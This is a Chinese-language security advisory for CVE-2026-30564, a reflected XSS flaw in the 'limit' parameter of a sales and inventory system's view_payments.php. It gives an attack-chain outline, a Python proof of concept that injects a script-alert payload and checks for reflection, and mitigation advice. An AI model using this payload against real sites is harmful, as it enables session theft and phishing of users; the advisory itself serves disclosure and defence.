CVE-2026-30564 CVSS 6.1 中危

CVE-2026-30564 SourceCodester销售库存系统XSS漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30564

漏洞类型

反射型跨站脚本 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Sales and Inventory System

漏洞概述

SourceCodester Sales and Inventory System 1.0版本在view_payments.php文件中发现存在反射型跨站脚本（XSS）漏洞。该问题源于应用程序未对“limit”参数进行严格的安全过滤和转义处理。攻击者可利用此缺陷，通过精心设计的恶意URL诱骗受害者点击，从而在受害者浏览器端执行任意恶意的Web脚本或HTML代码。此漏洞的成功利用可能导致用户敏感信息泄露、会话劫持或进行钓鱼攻击，对系统的安全性构成威胁。

技术细节

该漏洞属于典型的反射型跨站脚本攻击（Reflected XSS）。其技术核心在于SourceCodester Sales and Inventory System 1.0的view_payments.php页面在处理HTTP GET请求中的“limit”参数时，缺乏必要的输入验证和输出编码。应用程序直接将用户提交的参数值嵌入到服务器响应的HTML页面中，导致攻击者能够注入恶意的JavaScript代码或HTML标签。当受害者点击攻击者精心构造的恶意链接时，服务器会将未经过滤的Payload原样返回，受害者的浏览器随即解析并执行该脚本。由于CVSS向量显示为S:C（范围改变），漏洞利用可能突破当前页面上下文，进而窃取Session ID、重定向用户或执行进一步的客户端攻击。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用SourceCodester Sales and Inventory System 1.0，并确认存在view_payments.php页面。

STEP 2

武器化

攻击者构造包含恶意JavaScript代码的URL，将Payload嵌入到view_payments.php的'limit'参数中。

STEP 3

交付

攻击者通过钓鱼邮件或社交媒体将特制的恶意链接发送给目标受害者。

STEP 4

利用

受害者点击链接，浏览器向服务器发送请求。服务器未过滤参数，将恶意脚本返回给受害者浏览器。

STEP 5

执行

受害者的浏览器解析并执行恶意脚本，可能导致Cookie窃取或其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-30564
# Vulnerable Parameter: limit in view_payments.php

import requests

def check_xss(target_url):
    # The payload attempts to execute a simple JavaScript alert
    xss_payload = "<script>alert('CVE-2026-30564_XSS')</script>"
    
    # Construct the full URL with the vulnerable parameter
    params = {
        "limit": xss_payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=5)
        
        # Check if the payload is reflected in the response body
        if xss_payload in response.text:
            print("[+] Vulnerability Detected! Payload reflected in response.")
            print(f"[+] Exploit URL: {response.url}")
        else:
            print("[-] Payload not reflected. System might be patched or filtering input.")
    except requests.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://localhost/Inventory-System/view_payments.php"
    check_xss(target)

影响范围

SourceCodester Sales and Inventory System 1.0

防御指南

临时缓解措施

建议开发者立即审查view_payments.php文件代码，对'limit'参数进行类型检查（确保为数字）或使用htmlspecialchars()等函数进行转义。在未修复前，用户应避免点击来源不明的链接，管理员可暂时限制对受影响页面的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表